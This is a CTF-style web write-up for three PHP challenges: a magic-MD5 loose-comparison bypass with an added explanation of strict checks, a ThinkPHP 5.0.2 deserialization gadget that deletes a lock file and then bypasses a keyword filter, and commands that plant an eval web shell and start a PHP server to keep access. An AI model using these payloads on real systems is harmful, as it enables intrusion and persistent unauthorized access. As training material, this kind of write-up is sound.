Web check-in
<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}
<?php
// Search for a string of the form 0e<digits> whose MD5 loosely equals itself
for ($i = 0; $i < 10000000000000; $i++) {
    $str = '0e' . (string)$i;
    if (hash("md5", $str) == $str) {
        echo $str;
        break;
    }
}
0e215962017
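Why this value passes, as an added example that is not part of the original writeup or the challenge: PHP's == compares two numeric strings as numbers, so an input of the form 0e<digits> and a hash of the same form both evaluate to 0. The function names and sample inputs below are constructed for illustration; the strict variant shows the comparison the check should have used.

```php
<?php
// Added example: the challenge's loose check beside a strict one.
// Function names and sample inputs are constructed for illustration.

// As in the challenge: == on two numeric strings compares them as numbers,
// so "0e215962017" and a hash of the form "0e<digits>" both become 0.
function loose_check(string $input): bool
{
    return hash("md5", $input) == $input;
}

// Hardened: hash_equals() compares bytes in constant time, no type juggling.
// The is_string() guard also rejects array input such as ?YBB[]=1.
function strict_check($input): bool
{
    return is_string($input) && hash_equals(hash("md5", $input), $input);
}

// True when PHP would read the string as zero in scientific notation.
function is_zero_exponent(string $s): bool
{
    return preg_match('/^0+e[0-9]+$/i', $s) === 1;
}

// Constructed samples: the writeup's value, an input whose value is
// non-zero, a zero-valued input, and plain text.
$samples = ["0e215962017", "240610708", "0e1", "hello"];

foreach ($samples as $s) {
    $h = hash("md5", $s);
    printf(
        "%-12s hash_is_0e=%-3s input_is_0e=%-3s loose=%-5s strict=%s\n",
        $s,
        is_zero_exponent($h) ? "yes" : "no",
        is_zero_exponent($s) ? "yes" : "no",
        var_export(loose_check($s), true),
        var_export(strict_check($s), true)
    );
}
```

The loose check only succeeds when both the input and its hash are zero-exponent strings; the strict check can never succeed for MD5, because a 32-character hex digest cannot equal an 11-character input byte for byte.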
eztp
<?php
namespace app\index\controller;
class Index
{
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);
        if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
        if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
            echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
                $cmd='cat '.$cmd;
                echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }
        }else{
            echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
        }
    }
}
Visit: ?s=/index/index/backdoor
/var/www/html/application/index/controller/../../install.lock has not been deleted
Arbitrary file deletion PoC
<?php
namespace think\process\pipes;
class Windows{
    private $files = [];
    public function __construct(){
        $this->files=['/var/www/html/application/install.lock'];
    }
}
echo urlencode(serialize(new Windows()));
payload
?run[]=1&run[]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Finstall.lock%22%3B%7D%7D
?s=/index/index/backdoor
cmd=/fl%81ag
Don't leave me
<?php
// Challenge description:
// Find a way to maintain access. Once you are sure it works, submit check; the flag is generated only after check passes and does not exist before that.
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['action'];
switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}
- No write permission in the current directory (/var/www/html)
- After check, nginx and php-fpm are shut down and the web directory (/var/www/html) is emptied
Method 1
get:/action=cmd
post:cmd=file_put_contents("/tmp/index.php","<?php eval($_POST[1]);?>");system("sleep 5 %26%26 php -S 0.0.0.0:80 -t /tmp/");
get:/action=check
Method 2
get:/action=cmd
post:cmd=system('sleep 5 %26%26 php -S 0.0.0.0:80 -t /');
get:/action=check
get:/flag_ssk.txt
Method 3
cmd=system('curl http://checker/api/check;cp /f* /tmp/flag;php -S 0.0.0.0:80 -t /tmp/');